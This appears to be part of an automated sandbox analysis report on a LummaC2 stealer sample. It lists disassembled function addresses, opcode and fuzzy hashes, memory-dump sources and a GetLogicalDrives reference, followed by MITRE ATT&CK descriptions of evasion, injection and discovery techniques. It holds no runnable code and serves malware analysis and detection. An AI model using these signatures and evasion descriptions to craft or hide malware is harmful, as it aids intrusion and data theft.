String ID:
API String ID:
Opcode ID: c9660528848eb795099f5dbc418725243399d0dc5ee54d9a413ace79cd833391
Instruction ID: 916d1bae67fc42a6b6c6dd614e1c040b362276d2123fd3d197fd5b9600810c24
Opcode Fuzzy Hash: c9660528848eb795099f5dbc418725243399d0dc5ee54d9a413ace79cd833391
Instruction Fuzzy Hash: 21515CB16087548FE714DF29D89435BBBE1BBC4318F144E2DE5E987391E379DA088B82

Function 00A792C0 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e926adcd84e7791e17ec0bcb07fbc07608802667a934131f4bd9ffdcceb7f497
Instruction ID: 846304e3e563c64b9dfd128332faeab6500047b7f181baa92b9081ec36029b76
Opcode Fuzzy Hash: e926adcd84e7791e17ec0bcb07fbc07608802667a934131f4bd9ffdcceb7f497
Instruction Fuzzy Hash: D85105B2914211DBC7208F64DC52AAB77F4FF96364F18C52AF9998B3A1E7349801C752

Function 00A6EDB4 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 460b93f7d253eb5d64654e4908c70f8c97d9a8938afa627281bd9d665f25424b
Instruction ID: 72308338cef63172eac871e9ab353157b966411b4904e0d4b08a8a57513f4181
Opcode Fuzzy Hash: 460b93f7d253eb5d64654e4908c70f8c97d9a8938afa627281bd9d665f25424b
Instruction Fuzzy Hash: 845113796082C19FD724CB28D8807BEB7F2ABD5354F24CA2DD48697295EB718846C781

Function 00A7AAE0 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af33f0249009450581fdc6e29e0067ded6a281c0139ac5c60f2551fdaf4a91b5
Instruction ID: 1fa1709e7a6e96ba6f5932cef333fd5291620c1dcc27ad788a3cf0bcd1ddd9a5
Opcode Fuzzy Hash: af33f0249009450581fdc6e29e0067ded6a281c0139ac5c60f2551fdaf4a91b5
Instruction Fuzzy Hash: 2551473374A9916BD729C97C8C203AE6AA34BF3330F2DC369D4B58B3E4D6654C029352

Function 00A8B078 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df0146ff1ed4224625774a04dd1401492333ca58ab6c7e2365db4a21b00c7f93
Instruction ID: 247d9e53e85c85e470d0c1061224aff6f844793e1aa4ed1f12aecc4cc4169822
Opcode Fuzzy Hash: df0146ff1ed4224625774a04dd1401492333ca58ab6c7e2365db4a21b00c7f93
Instruction Fuzzy Hash: 074115A560C3C19BE735DF2998B47B7BBD0AFA3304F28496CE4DA4B282D7304505C762

Function 00A97D00 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58de129574be1acbd49948a405a315f5c683339fccb2d7583d1a3100159ff58b
Instruction ID: 5a47bdc3f0f5e2139885c6e69fce1ae3351db3592e2105fa2be2bc1728bf9d31
Opcode Fuzzy Hash: 58de129574be1acbd49948a405a315f5c683339fccb2d7583d1a3100159ff58b
Instruction Fuzzy Hash: 1F4106B6B183145BEB10AF54DD81B7FB7E5EF85704F140828F88597241EB36ED0487A6

Function 00A97EA0 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49588468f4a352f4693d4c90c6e1848724b645c41352eb3d467dfdc9ac2005af
Instruction ID: a1d313995d3613319305d555c66365401321b2d2d3074a787bc88aefb7355d10
Opcode Fuzzy Hash: 49588468f4a352f4693d4c90c6e1848724b645c41352eb3d467dfdc9ac2005af
Instruction Fuzzy Hash: AA41D173B196204BD708CE398C4026BBAE36BD5730F2AC73DE9B5973D5DA7988058281

Function 00A9F040 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5eb0e90b6a41b766c0c07cd422f7168c26f5484fc916cf0051dc10bdcfb5f957
Instruction ID: c3972a74bda97caadd0d4739d6c4776f9191aaa119d5e5560ffefc4eb8cfd9dc
Opcode Fuzzy Hash: 5eb0e90b6a41b766c0c07cd422f7168c26f5484fc916cf0051dc10bdcfb5f957
Instruction Fuzzy Hash: 80410171705305EFEB24CB25EDC0B76B3E6EB89714F24862CE185D7291DB30B811C681

Function 00A9B46A Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4968fe36cdbbc92fe160fc63b4fcb63207375e4cc832be3ca517ac86c6489512
Instruction ID: 099bb420c23bc9887926022379e0a141eb7369f5741033a20d0fc5b33684210c
Opcode Fuzzy Hash: 4968fe36cdbbc92fe160fc63b4fcb63207375e4cc832be3ca517ac86c6489512
Instruction Fuzzy Hash: AC4179B5B106029BCB08CF78DD615BEBBE2FB96300B08862CD012E7365EB346556CB54

Function 00A76D52 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e10f29b3c3b35cbc8e5c59f30c0776c65da1a857abe4523edeb144d29bdb1c6e
Instruction ID: 3f6786d034235081011f855e63cbd04236db6d7ccbc23d9fc5e1bf06d9ba047f
Opcode Fuzzy Hash: e10f29b3c3b35cbc8e5c59f30c0776c65da1a857abe4523edeb144d29bdb1c6e
Instruction Fuzzy Hash: E411A2B5B08A028BE329CB65DC4137777A2EBDA319F28C52CC0CE93251E63588568A46

Function 00A68A20 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 293d11ecb15a4287942a121f2196c36d4946016947497cfec40f8ac486ff9ff3
Instruction ID: b31cfd4726059d1f95203e2468be4770359bbde6f8e5bc3ab5cba6a1dc3aec9f
Opcode Fuzzy Hash: 293d11ecb15a4287942a121f2196c36d4946016947497cfec40f8ac486ff9ff3
Instruction Fuzzy Hash: F921FD77E519204BE310CE96CC403527796A7D9338F3EC6B8C9689B392D53BAD0386C0

Function 00A9BCDB Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30bb8926a87eb00f4fbb1b132b7b7cad0e442b537b4290179e08098fd7850795
Instruction ID: e881eed136bebad73fd7ebf4fac8f90fbba00c113699dfb67e7d59a1596db871
Opcode Fuzzy Hash: 30bb8926a87eb00f4fbb1b132b7b7cad0e442b537b4290179e08098fd7850795
Instruction Fuzzy Hash: 12110672F146118BCF18CF69DD512BAB7F2ABC5200B19C155C855A7348E738AC12CBE4

Function 00A79605 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c1995ad9f6c1c6b6d2e609c62bf0d30547fe76219bebe168fd01f6893a604b3
Instruction ID: fc0c35813247b7bdcf5602770e13ba60aa31e31eb008a3ddc9d8522ce776352e
Opcode Fuzzy Hash: 3c1995ad9f6c1c6b6d2e609c62bf0d30547fe76219bebe168fd01f6893a604b3
Instruction Fuzzy Hash: 95219531A0D7618BC769CB24D8952ABB3A2BBD9714F15C52EC48F43210DB31984BC781

Function 00A88640 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4abefb8d968542cc83c5f501073c49a642dd4d782fdfa5ac46f4784bac56c15c
Instruction ID: df96751a51ebd956ac83c93cbbccc0debfff18f599a2cde53de3434382a67756
Opcode Fuzzy Hash: 4abefb8d968542cc83c5f501073c49a642dd4d782fdfa5ac46f4784bac56c15c
Instruction Fuzzy Hash: 8C01DE35909211DBC7089F50D84157BB7F2EB8A714F55982CE082A3292EB3CEC0B8B96

Function 00A89DA0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e7b69c494abd83f6118a72f7de64ff912b6fa8dc0b82fccbac9464bcbb27eac
Instruction ID: 4555c26d757b8c47ba93a470f4a5a34911f13db48fb6227c6b3616d3c311a958
Opcode Fuzzy Hash: 2e7b69c494abd83f6118a72f7de64ff912b6fa8dc0b82fccbac9464bcbb27eac
Instruction Fuzzy Hash: 6A0121F5A1030157DB20FF54D5C1B3BB6A86F95704F1C442CE90957242EBB6EC15C795

Function 00A746C0 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a984843b570b7378253929d1441754c9cdf9516a4ccd76f455c2bd59a9e2d53
Instruction ID: a0ce2eeeedf8520919725a52ac446eb5999db42b767bb684527ed3503fe7a2db
Opcode Fuzzy Hash: 7a984843b570b7378253929d1441754c9cdf9516a4ccd76f455c2bd59a9e2d53
Instruction Fuzzy Hash: E401A27BA013128B8324CF5CC4D06ABB3B0FF9A795B2A945DD5815B370D7319D158264

Function 00A810F3 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a53a8fba5b84127fa20673072dd31eccd288010c2145d4acc06ae2b2f767e483
Instruction ID: 25f41e69719f85b67aab06bfcc9358729998e2cd651d4cacce854fdc88a9e657
Opcode Fuzzy Hash: a53a8fba5b84127fa20673072dd31eccd288010c2145d4acc06ae2b2f767e483
Instruction Fuzzy Hash: ACB092A5C2A4108698116A603E028AEB0380A13608F082030E80622206BB9AE21A80AF

Function 00A834B7 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 246COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 00A83606

Strings

uw, xrefs: 00A83503
pz, xrefs: 00A836BA
xs, xrefs: 00A834FC
pz, xrefs: 00A8376E, 00A834A8

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID: DrivesLogical
String ID: pz$pz$uw$xs
API String ID: 999431828-3977666006
Opcode ID: 6942f3e25f2f6bd846b53f7bad519c5510e9b949d80778a7ce0b51c8844c82d6
Instruction ID: 05db0dad0c6fc57b06f866b47a14c5989db538a2608449c9fcc2b96f6d09a9b2
Opcode Fuzzy Hash: 6942f3e25f2f6bd846b53f7bad519c5510e9b949d80778a7ce0b51c8844c82d6
Instruction Fuzzy Hash: 938101B5911206CFCB14DF64D991AAABB70FF1A304B4992A8D445AF362E734D982CFC4

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

